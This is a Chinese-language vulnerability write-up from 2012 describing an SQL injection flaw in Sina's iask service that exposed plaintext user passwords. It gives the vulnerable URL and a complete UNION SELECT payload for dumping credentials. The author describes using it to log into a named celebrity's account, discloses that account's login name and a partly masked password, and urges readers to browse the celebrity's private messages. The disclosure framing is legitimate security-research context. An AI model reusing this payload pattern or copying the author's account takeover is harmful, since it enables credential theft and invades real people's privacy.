2012年新浪微博用戶密碼明文泄露漏洞
相關(guān)廠商:www.sina.com
發(fā)現(xiàn)時(shí)間:2012-1-1
漏洞類型:sql注射
危害等級(jí):高
漏洞狀態(tài):已修復(fù)
首先申明:該漏洞發(fā)現(xiàn)后本人已聯(lián)系新浪官方修復(fù)漏洞,目前漏洞以修補(bǔ)。文章內(nèi)容公布,僅供參考學(xué)習(xí)。 新浪網(wǎng)iask存在sql注射漏洞,利用漏洞可讀取iask數(shù)據(jù)庫(kù)內(nèi)內(nèi)容。包括明文密碼在內(nèi)的7000多W新浪用戶信息。
漏洞存在點(diǎn):
http://iask.sina.com.cn//prize/event_getorderlist.php?id=999999.9
漏洞利用方式: http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+
UNION+ALL+SELECT+%28SELECT+
concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,0x245e%29+FROM+
%60whatis%60.user+
where+uid=1303977362+LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--
這里我們通過構(gòu)造數(shù)據(jù)庫(kù)查詢語(yǔ)句獲得用戶uid=1303977362的uid、login、email、passwd等信息。
通過修改字段還可以獲取其他信息 。 直接舉個(gè)例子比如我們通過新浪微波查找到劉謙,點(diǎn)擊他的個(gè)人資料。我們可以再瀏覽器地址欄處看到劉謙的uid(新浪用戶數(shù)字id),此處uid為12715428867
直接構(gòu)造地址:
http://iask.sina.com.cn/prize/event_getorderlist.php?id=999999.9+
UNION+ALL+SELECT+%28SELECT+concat%280x5e24,user.uid,0x7c,user.email,0x7c,user.login,0x7c,user.passwd,
0x245e%29+FROM+%60whatis%60.user+where+uid=12715428867+
LIMIT+0,1%29,2,3,4,5,6,7,8,9,10,11--
直接獲得劉謙的賬號(hào)和密碼
這里賬號(hào)是luchenmagic密碼為2lo*****(保密) 嘗試登陸
成功登陸。劉謙微薄。這里你可以看看你的偶像的各種私信,聊天記錄之類的。 接下來(lái)的事情你可以自由發(fā)揮了。但是對(duì)于一個(gè)黑客而言,這只不過是一個(gè)開始而已(這里我并無(wú)惡意,拿劉謙的賬號(hào)來(lái)測(cè)試只是為了致敬,希望有機(jī)會(huì)能夠見證奇跡!)。
后話:
1.2011年年底的csdn、天涯等用戶庫(kù)的泄露只不過是冰山一腳。
2.新浪在csdn、天涯等用戶庫(kù)泄露后申稱新浪數(shù)據(jù)庫(kù)并沒有泄露,而且密碼是密文保存。這里要提出質(zhì)疑了,數(shù)據(jù)庫(kù)密碼明明是明文保存。至少iask中大部分用戶是明文保存密碼(部分用戶查不到密碼)。至于用戶信息是否泄露,這個(gè)不用說了把?
3.網(wǎng)絡(luò)泄密涉及到太多。不管是普通網(wǎng)民,還是明星名人,都被牽涉進(jìn)來(lái)。這里測(cè)試不少明星,基本上都能通過微薄獲取他們的私人信息,甚至登陸他們的msn。(香港爆料雜志來(lái)找我把。開個(gè)玩笑。。。)
4.這個(gè)漏洞發(fā)現(xiàn)后我便通知了新浪官方,新浪在漏洞反饋和應(yīng)急處理這方面做的不夠快。收到漏洞后連給我回個(gè)郵件或者表示感謝都沒有。(我是無(wú)私奉獻(xiàn)白帽子,被活雷鋒了。)
5.祝新年快樂。
【編輯推薦】
